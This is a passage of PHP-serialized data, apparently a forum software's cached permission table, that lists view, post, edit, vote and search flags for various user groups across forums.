1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"691\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"692\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"694\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"774\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:19;a:15:{i:1;a:18:{s:3:\"pid\";s:3:\"622\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"623\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"629\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:3;a:18:{s:3:\"pid\";s:3:\"624\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"3\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:4;a:18:{s:3:\"pid\";s:3:\"625\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"4\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"626\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:6;a:18:{s:3:\"pid\";s:3:\"627\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"628\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"630\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"631\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"632\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"633\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"634\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"650\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"766\";s:3:\"fid\";s:2:\"19\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:83;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"810\";s:3:\"fid\";s:2:\"83\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:64;a:8:{i:5;a:18:{s:3:\"pid\";s:3:\"816\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"817\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"818\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"819\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"820\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"821\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"822\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"823\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:9;a:1:{i:5;a:18:{s:3:\"pid\";s:2:\"69\";s:3:\"fid\";s:1:\"9\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:10;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"10\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:11;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"11\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:12;a:2:{i:5;a:18:{s:3:\"pid\";s:3:\"132\";s:3:\"fid\";s:2:\"12\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"133\";s:3:\"fid\";s:2:\"12\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:59;a:2:{i:5;a:18:{s:3:\"pid\";s:3:\"132\";s:3:\"fid\";s:2:\"59\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"219\";s:3:\"fid\";s:2:\"59\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:13;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"13\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:14;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"14\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\"